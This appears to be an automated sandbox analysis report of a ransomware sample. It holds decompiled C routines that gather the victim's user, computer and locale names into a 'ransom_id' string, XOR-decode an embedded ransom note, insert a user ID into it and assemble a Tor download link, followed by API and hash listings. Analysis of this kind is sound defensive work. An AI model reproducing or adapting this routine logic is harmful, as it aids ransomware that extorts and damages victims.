                                    				_t96 = _a4;
                                    				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
                                    					lstrcatW(_t96,  *(__ecx + 0x88));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x84));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *_t91 != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 4));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 8));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x10));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x14));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x1c));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x20));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x28));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x2c));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x34));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x38));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x40));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x44));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x4c));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x50));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x58));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x5c));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
                                    					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
                                    					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
                                    					_a4 = _t47;
                                    					if(_t94 == 0) {
                                    						wsprintfW(_t47, L"undefined");
                                    					} else {
                                    						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
                                    					}
                                    					lstrcatW(_t96,  *(_t91 + 0x64));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96, _a4);
                                    					lstrcatW(_t96, "&");
                                    					VirtualFree(_a4, 0, 0x8000); // executed
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x78));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x7c));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
                                    				return _t96;
                                    			}







                                    0x0f5870a4
                                    0x0f5870a7
                                    0x0f5870b8
                                    0x0f5870c1
                                    0x0f5870c9
                                    0x0f5870d2
                                    0x0f5870da
                                    0x0f5870da
                                    0x0f5870df
                                    0x0f5870e5
                                    0x0f5870ed
                                    0x0f5870f3
                                    0x0f5870fb
                                    0x0f5870fb
                                    0x0f587101
                                    0x0f587107
                                    0x0f58710f
                                    0x0f587115
                                    0x0f58711d
                                    0x0f58711d
                                    0x0f587123
                                    0x0f587129
                                    0x0f587131
                                    0x0f587137
                                    0x0f58713f
                                    0x0f58713f
                                    0x0f587145
                                    0x0f58714b
                                    0x0f587153
                                    0x0f587159
                                    0x0f587161
                                    0x0f587161
                                    0x0f587167
                                    0x0f58716d
                                    0x0f587175
                                    0x0f58717b
                                    0x0f587183
                                    0x0f587183
                                    0x0f587189
                                    0x0f58718f
                                    0x0f587197
                                    0x0f58719d
                                    0x0f5871a5
                                    0x0f5871a5
                                    0x0f5871ab
                                    0x0f5871b1
                                    0x0f5871b9
                                    0x0f5871bf
                                    0x0f5871c7
                                    0x0f5871c7
                                    0x0f5871cd
                                    0x0f5871d3
                                    0x0f5871db
                                    0x0f5871e1
                                    0x0f5871e9
                                    0x0f5871e9
                                    0x0f5871ef
                                    0x0f5871fc
                                    0x0f587202
                                    0x0f587205
                                    0x0f58720a
                                    0x0f587227
                                    0x0f58720c
                                    0x0f587216
                                    0x0f58721c
                                    0x0f587234
                                    0x0f58723c
                                    0x0f587242
                                    0x0f58724a
                                    0x0f587256
                                    0x0f587256
                                    0x0f587260
                                    0x0f587266
                                    0x0f58726e
                                    0x0f587274
                                    0x0f58727c
                                    0x0f58727c
                                    0x0f587288
                                    0x0f587292

                                    APIs
                                    • lstrcatW.KERNEL32(?,?), ref: 0F5870C1
                                    • lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F5870C9
                                    • lstrcatW.KERNEL32(?,?), ref: 0F5870D2
                                    • lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F5870DA
                                    • lstrcatW.KERNEL32(?,?), ref: 0F5870E5
                                    • lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F5870ED
                                    • lstrcatW.KERNEL32(?,?), ref: 0F5870F3
                                    • lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F5870FB
                                    • lstrcatW.KERNEL32(?,?), ref: 0F587107
                                    • lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F58710F
                                    • lstrcatW.KERNEL32(?,?), ref: 0F587115
                                    • lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F58711D
                                    • lstrcatW.KERNEL32(?,?), ref: 0F587129
                                    • lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F587131
                                    • lstrcatW.KERNEL32(?,?), ref: 0F587137
                                    • lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F58713F
                                    • lstrcatW.KERNEL32(?,?), ref: 0F58714B
                                    • lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F587153
                                    • lstrcatW.KERNEL32(?,?), ref: 0F587159
                                    • lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F587161
                                    • lstrcatW.KERNEL32(?,?), ref: 0F58716D
                                    • lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F587175
                                    • lstrcatW.KERNEL32(?,?), ref: 0F58717B
                                    • lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F587183
                                    • lstrcatW.KERNEL32(?,0F584B36), ref: 0F58718F
                                    • lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F587197
                                    • lstrcatW.KERNEL32(?,?), ref: 0F58719D
                                    • lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F5871A5
                                    • lstrcatW.KERNEL32(?,?), ref: 0F5871B1
                                    • lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F5871B9
                                    • lstrcatW.KERNEL32(?,?), ref: 0F5871BF
                                    • lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F5871C7
                                    • lstrcatW.KERNEL32(?,?), ref: 0F5871D3
                                    • lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F5871DB
                                    • lstrcatW.KERNEL32(?,?), ref: 0F5871E1
                                    • lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F5871E9
                                    • VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0F584869,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0F5871FC
                                    • wsprintfW.USER32 ref: 0F587216
                                    • wsprintfW.USER32 ref: 0F587227
                                    • lstrcatW.KERNEL32(?,?), ref: 0F587234
                                    • lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F58723C
                                    • lstrcatW.KERNEL32(?,?), ref: 0F587242
                                    • lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F58724A
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F587256
                                    • lstrcatW.KERNEL32(?,?), ref: 0F587266
                                    • lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F58726E
                                    • lstrcatW.KERNEL32(?,?), ref: 0F587274
                                    • lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F58727C
                                    • lstrlenW.KERNEL32(?,00000000,00000000,?,?,0F584869,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58727F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
                                    • String ID: %x%x$undefined
                                    • API String ID: 3872469520-3801831566
                                    • Opcode ID: 0cd3b4391d2c63211192b1c7f79840fa49f60f827fb5d8bd0323d603519b30f8
                                    • Instruction ID: 8217b8ec7758a150832e117d2c903c6ddb9c34be0b0b9604d55fddecea25f80f
                                    • Opcode Fuzzy Hash: 0cd3b4391d2c63211192b1c7f79840fa49f60f827fb5d8bd0323d603519b30f8
                                    • Instruction Fuzzy Hash: D6510B31146658B6DB273B618C49FEF3F59FF8A700F060060F9103845A8B699253EFEA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 198 f5842b0-f5842c5 199 f584598-f58459d 198->199 200 f5842cb-f584330 call f583bc0 call f587490 call f5872a0 VirtualAlloc 198->200 207 f584341 200->207 208 f584332-f58433b 200->208 210 f584343-f58438a call f5870a0 call f5881f0 lstrlenW 207->210 208->207 209 f58433d-f58433f 208->209 209->210 215 f584390-f5843a2 210->215 215->215 216 f5843a4 215->216 217 f5843b0-f5843bd 216->217 217->217 218 f5843bf-f5843dc call f5881f0 217->218 221 f5843de 218->221 222 f584456-f584545 218->222 223 f5843e0-f584406 lstrcpyW lstrlenW 221->223 224 f584578-f584593 VirtualFree call f587d70 222->224 225 f584547-f584562 VirtualAlloc 222->225 223->222 226 f584408-f58440d 223->226 224->199 225->224 227 f584564-f584575 wsprintfW 225->227 229 f584413-f58441b 226->229 227->224 230 f58441d 229->230 231 f584447-f584454 229->231 232 f584420-f584426 230->232 231->222 231->229 233 f58442c-f584432 232->233 234 f58459e-f5845a5 232->234 235 f58443d-f584441 233->235 236 f584434-f58443b 233->236 234->223 235->231 235->234 236->232 236->235
                                    C-Code - Quality: 49%
                                    			E0F5842B0(void* __ecx, void* __edx) {
                                    				char _v148;
                                    				char _v152;
                                    				WCHAR* _v156;
                                    				void* _v160;
                                    				intOrPtr _v168;
                                    				intOrPtr _v172;
                                    				intOrPtr _v176;
                                    				intOrPtr _v180;
                                    				intOrPtr _v184;
                                    				intOrPtr _v188;
                                    				intOrPtr _v192;
                                    				intOrPtr _v196;
                                    				intOrPtr _v200;
                                    				intOrPtr _v204;
                                    				intOrPtr _v208;
                                    				intOrPtr _v212;
                                    				intOrPtr _v216;
                                    				intOrPtr _v220;
                                    				intOrPtr _v224;
                                    				intOrPtr _v228;
                                    				intOrPtr _v232;
                                    				char _v236;
                                    				intOrPtr _v240;
                                    				void* _v244;
                                    				intOrPtr _v248;
                                    				intOrPtr _v252;
                                    				intOrPtr _v256;
                                    				intOrPtr _v260;
                                    				intOrPtr _v264;
                                    				intOrPtr _v268;
                                    				intOrPtr _v272;
                                    				intOrPtr _v276;
                                    				char _v280;
                                    				void* _t54;
                                    				void* _t58;
                                    				void* _t60;
                                    				signed int _t61;
                                    				void* _t62;
                                    				WCHAR* _t65;
                                    				signed short _t69;
                                    				signed short* _t70;
                                    				WCHAR* _t77;
                                    				signed int _t82;
                                    				signed int _t83;
                                    				void* _t87;
                                    				void* _t90;
                                    				long _t93;
                                    				WCHAR* _t94;
                                    				signed int _t97;
                                    				void* _t98;
                                    				WCHAR* _t100;
                                    				void* _t102;
                                    
                                    				if( *0xf592a64 != 0) {
                                    					L24:
                                    					return _t54;
                                    				}
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				E0F583BC0( &_v148);
                                    				E0F587490( &_v236, __edx); // executed
                                    				_t97 = E0F5872A0( &_v236);
                                    				_t93 = 0x42 + _t97 * 2;
                                    				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
                                    				_v244 = _t58;
                                    				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
                                    					_t98 = 0;
                                    				} else {
                                    					_t98 = _t58;
                                    				}
                                    				E0F5870A0( &_v152, _t98); // executed
                                    				_t60 = E0F5881F0(_t98, L"ransom_id=");
                                    				_t61 = lstrlenW(L"ransom_id=");
                                    				asm("movdqa xmm1, [0xf590510]");
                                    				_t77 = 0xf592000;
                                    				_t87 = 0xa3;
                                    				_t100 = _t60 + _t61 * 2;
                                    				_t62 = 0xa30;
                                    				_v160 = _t100;
                                    				do {
                                    					_t13 =  &(_t77[8]); // 0x44004e
                                    					_t77 = _t13;
                                    					asm("movdqu xmm0, [ecx-0x10]");
                                    					asm("pxor xmm0, xmm1");
                                    					asm("movdqu [ecx-0x10], xmm0");
                                    					_t87 = _t87 - 1;
                                    				} while (_t87 != 0);
                                    				do {
                                    					 *(_t62 + 0xf592000) =  *(_t62 + 0xf592000) ^ 0x00000005;
                                    					_t62 = _t62 + 1;
                                    				} while (_t62 < 0xa38);
                                    				 *0xf592a64 = 0xf592000;
                                    				_t94 = E0F5881F0(0xf592000, L"{USERID}");
                                    				if(_t94 == 0) {
                                    					L20:
                                    					_v280 = 0x740068;
                                    					_v276 = 0x700074;
                                    					_v272 = 0x3a0073;
                                    					_v268 = 0x2f002f;
                                    					_v264 = 0x770077;
                                    					_v260 = 0x2e0077;
                                    					_v256 = 0x6f0074;
                                    					_v252 = 0x700072;
                                    					_v248 = 0x6f0072;
                                    					_v244 = 0x65006a;
                                    					_v240 = 0x740063;
                                    					_v236 = 0x6f002e;
                                    					_v232 = 0x670072;
                                    					_v228 = 0x64002f;
                                    					_v224 = 0x77006f;
                                    					_v220 = 0x6c006e;
                                    					_v216 = 0x61006f;
                                    					_v212 = 0x2f0064;
                                    					_v208 = 0x6f0064;
                                    					_v204 = 0x6e0077;
                                    					_v200 = 0x6f006c;
                                    					_v196 = 0x640061;
                                    					_v192 = 0x65002d;
                                    					_v188 = 0x730061;
                                    					_v184 = 0x2e0079;
                                    					_v180 = 0x740068;
                                    					_v176 = 0x6c006d;
                                    					_v172 = 0x65002e;
                                    					_v168 = 0x6e;
                                    					if( *0xf592a44 == 0) {
                                    						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    						 *0xf592a44 = _t65;
                                    						if(_t65 != 0) {
                                    							wsprintfW(_t65, L"%s",  &_v280);
                                    						}
                                    					}
                                    					VirtualFree(_v160, 0, 0x8000); // executed
                                    					_t54 = E0F587D70( &_v152);
                                    					goto L24;
                                    				}
                                    				while(1) {
                                    					L11:
                                    					lstrcpyW(_t94, _t100);
                                    					_t94[lstrlenW(_t94)] = 0x20;
                                    					_t94 = 0xf592000;
                                    					_t69 =  *0xf592000; // 0xfeff
                                    					if(_t69 == 0) {
                                    						goto L20;
                                    					}
                                    					_t82 = _t69 & 0x0000ffff;
                                    					_t102 = 0xf592000 - L"{USERID}";
                                    					do {
                                    						_t70 = L"{USERID}";
                                    						if(_t82 == 0) {
                                    							goto L19;
                                    						}
                                    						while(1) {
                                    							_t83 =  *_t70 & 0x0000ffff;
                                    							if(_t83 == 0) {
                                    								break;
                                    							}
                                    							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
                                    							if(_t90 != 0) {
                                    								L18:
                                    								if( *_t70 == 0) {
                                    									break;
                                    								}
                                    								goto L19;
                                    							}
                                    							_t70 =  &(_t70[1]);
                                    							if( *(_t102 + _t70) != _t90) {
                                    								continue;
                                    							}
                                    							goto L18;
                                    						}
                                    						_t100 = _v156;
                                    						goto L11;
                                    						L19:
                                    						_t20 =  &(_t94[1]); // 0x2d002d
                                    						_t82 =  *_t20 & 0x0000ffff;
                                    						_t94 =  &(_t94[1]);
                                    						_t102 = _t102 + 2;
                                    					} while (_t82 != 0);
                                    					goto L20;
                                    				}
                                    				goto L20;
                                    			}























































                                    0x0f5842c5
                                    0x0f584598
                                    0x0f58459d
                                    0x0f58459d
                                    0x0f5842cb
                                    0x0f5842cc
                                    0x0f5842ce
                                    0x0f5842cf
                                    0x0f5842d4
                                    0x0f5842d6
                                    0x0f5842d7
                                    0x0f5842d9
                                    0x0f5842da
                                    0x0f5842dc
                                    0x0f5842dd
                                    0x0f5842df
                                    0x0f5842e0
                                    0x0f5842e5
                                    0x0f5842e7
                                    0x0f5842e8
                                    0x0f5842f1
                                    0x0f5842fd
                                    0x0f58430e
                                    0x0f584317
                                    0x0f584321
                                    0x0f584327
                                    0x0f584330
                                    0x0f584341
                                    0x0f58433d
                                    0x0f58433d
                                    0x0f58433d
                                    0x0f58434b
                                    0x0f584357
                                    0x0f584363
                                    0x0f584369
                                    0x0f584371
                                    0x0f584376
                                    0x0f58437b
                                    0x0f58437e
                                    0x0f584383
                                    0x0f584390
                                    0x0f584390
                                    0x0f584390
                                    0x0f584393
                                    0x0f584398
                                    0x0f58439c
                                    0x0f5843a1
                                    0x0f5843a1
                                    0x0f5843b0
                                    0x0f5843b0
                                    0x0f5843b7
                                    0x0f5843b8
                                    0x0f5843c4
                                    0x0f5843d8
                                    0x0f5843dc
                                    0x0f584456
                                    0x0f58445d
                                    0x0f584465
                                    0x0f58446d
                                    0x0f584475
                                    0x0f58447d
                                    0x0f584485
                                    0x0f58448d
                                    0x0f584495
                                    0x0f58449d
                                    0x0f5844a5
                                    0x0f5844ad
                                    0x0f5844b5
                                    0x0f5844bd
                                    0x0f5844c5
                                    0x0f5844cd
                                    0x0f5844d5
                                    0x0f5844dd
                                    0x0f5844e5
                                    0x0f5844ed
                                    0x0f5844f5
                                    0x0f5844fd
                                    0x0f584505
                                    0x0f58450d
                                    0x0f584515
                                    0x0f58451d
                                    0x0f584525
                                    0x0f58452d
                                    0x0f584535
                                    0x0f58453d
                                    0x0f584545
                                    0x0f584555
                                    0x0f58455b
                                    0x0f584562
                                    0x0f58456f
                                    0x0f584575
                                    0x0f584562
                                    0x0f584586
                                    0x0f584593
                                    0x00000000
                                    0x0f584593
                                    0x0f5843e0
                                    0x0f5843e0
                                    0x0f5843e2
                                    0x0f5843f4
                                    0x0f5843f8
                                    0x0f5843fd
                                    0x0f584406
                                    0x00000000
                                    0x00000000
                                    0x0f58440a
                                    0x0f58440d
                                    0x0f584413
                                    0x0f584413
                                    0x0f58441b
                                    0x00000000
                                    0x00000000
                                    0x0f584420
                                    0x0f584420
                                    0x0f584426
                                    0x00000000
                                    0x00000000
                                    0x0f584430
                                    0x0f584432
                                    0x0f58443d
                                    0x0f584441
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584441
                                    0x0f584434
                                    0x0f58443b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f58443b
                                    0x0f58459e
                                    0x00000000
                                    0x0f584447
                                    0x0f584447
                                    0x0f584447
                                    0x0f58444b
                                    0x0f58444e
                                    0x0f584451
                                    0x00000000
                                    0x0f584413
                                    0x00000000

                                    APIs
                                      • Part of subcall function 0F583BC0: GetProcessHeap.KERNEL32(?,?,0F584807,00000000,?,00000000,00000000), ref: 0F583C5C
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0F5874B7
                                      • Part of subcall function 0F587490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F5874C8
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0F5874E6
                                      • Part of subcall function 0F587490: GetComputerNameW.KERNEL32 ref: 0F5874F0
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F587510
                                      • Part of subcall function 0F587490: wsprintfW.USER32 ref: 0F587551
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F58756E
                                      • Part of subcall function 0F587490: RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
                                      • Part of subcall function 0F587490: RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
                                      • Part of subcall function 0F587490: RegCloseKey.KERNELBASE(00000000), ref: 0F5875D2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584321
                                    • lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584363
                                    • lstrcpyW.KERNEL32 ref: 0F5843E2
                                    • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F5843E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
                                    • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
                                    • API String ID: 4100118565-2385900546
                                    • Opcode ID: 432544a892d25b4be73940f56c19447610758be2069dd28a78988cd64a069953
                                    • Instruction ID: 915bb084315fbe07fc589522136c87c40f4af6723162c7fd71625b339812ff7c
                                    • Opcode Fuzzy Hash: 432544a892d25b4be73940f56c19447610758be2069dd28a78988cd64a069953
                                    • Instruction Fuzzy Hash: 4B710470504341DBE724EF10D80976B7FE1FB80758F50492CFA856B2A2EBF9954ACB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 237 f5843a6-f5843ad 238 f5843b0-f5843bd 237->238 238->238 239 f5843bf-f5843dc call f5881f0 238->239 242 f5843de 239->242 243 f584456-f584545 239->243 244 f5843e0-f584406 lstrcpyW lstrlenW 242->244 245 f584578-f58459d VirtualFree call f587d70 243->245 246 f584547-f584562 VirtualAlloc 243->246 244->243 247 f584408-f58440d 244->247 246->245 248 f584564-f584575 wsprintfW 246->248 250 f584413-f58441b 247->250 248->245 252 f58441d 250->252 253 f584447-f584454 250->253 254 f584420-f584426 252->254 253->243 253->250 255 f58442c-f584432 254->255 256 f58459e-f5845a5 254->256 257 f58443d-f584441 255->257 258 f584434-f58443b 255->258 256->244 257->253 257->256 258->254 258->257
                                    C-Code - Quality: 100%
                                    			E0F5843A6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
                                    				void* _t41;
                                    				void* _t44;
                                    				WCHAR* _t45;
                                    				signed short _t49;
                                    				signed short* _t50;
                                    				signed int _t55;
                                    				signed int _t56;
                                    				void* _t59;
                                    				WCHAR* _t60;
                                    				WCHAR* _t62;
                                    				void* _t65;
                                    
                                    				_t41 = __eax;
                                    				do {
                                    					 *(_t41 + 0xf592000) =  *(_t41 + 0xf592000) ^ 0x00000005;
                                    					_t41 = _t41 + 1;
                                    				} while (_t41 < 0xa38);
                                    				 *0xf592a64 = 0xf592000;
                                    				_t60 = E0F5881F0(0xf592000, L"{USERID}");
                                    				if(_t60 != 0) {
                                    					while(1) {
                                    						L4:
                                    						lstrcpyW(_t60, _t62);
                                    						_t60[lstrlenW(_t60)] = 0x20;
                                    						_t60 = 0xf592000;
                                    						_t49 =  *0xf592000; // 0xfeff
                                    						if(_t49 == 0) {
                                    							goto L13;
                                    						}
                                    						_t55 = _t49 & 0x0000ffff;
                                    						_t65 = 0xf592000 - L"{USERID}";
                                    						do {
                                    							_t50 = L"{USERID}";
                                    							if(_t55 == 0) {
                                    								goto L12;
                                    							} else {
                                    								while(1) {
                                    									_t56 =  *_t50 & 0x0000ffff;
                                    									if(_t56 == 0) {
                                    										break;
                                    									}
                                    									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
                                    									if(_t59 != 0) {
                                    										L11:
                                    										if( *_t50 == 0) {
                                    											break;
                                    										} else {
                                    											goto L12;
                                    										}
                                    									} else {
                                    										_t50 =  &(_t50[1]);
                                    										if( *(_t65 + _t50) != _t59) {
                                    											continue;
                                    										} else {
                                    											goto L11;
                                    										}
                                    									}
                                    									goto L13;
                                    								}
                                    								_t62 = _a132;
                                    								goto L4;
                                    							}
                                    							goto L13;
                                    							L12:
                                    							_t7 =  &(_t60[1]); // 0x2d002d
                                    							_t55 =  *_t7 & 0x0000ffff;
                                    							_t60 =  &(_t60[1]);
                                    							_t65 = _t65 + 2;
                                    						} while (_t55 != 0);
                                    						goto L13;
                                    					}
                                    				}
                                    				L13:
                                    				_a8 = 0x740068;
                                    				_a12 = 0x700074;
                                    				_a16 = 0x3a0073;
                                    				_a20 = 0x2f002f;
                                    				_a24 = 0x770077;
                                    				_a28 = 0x2e0077;
                                    				_a32 = 0x6f0074;
                                    				_a36 = 0x700072;
                                    				_a40 = 0x6f0072;
                                    				_a44 = 0x65006a;
                                    				_a48 = 0x740063;
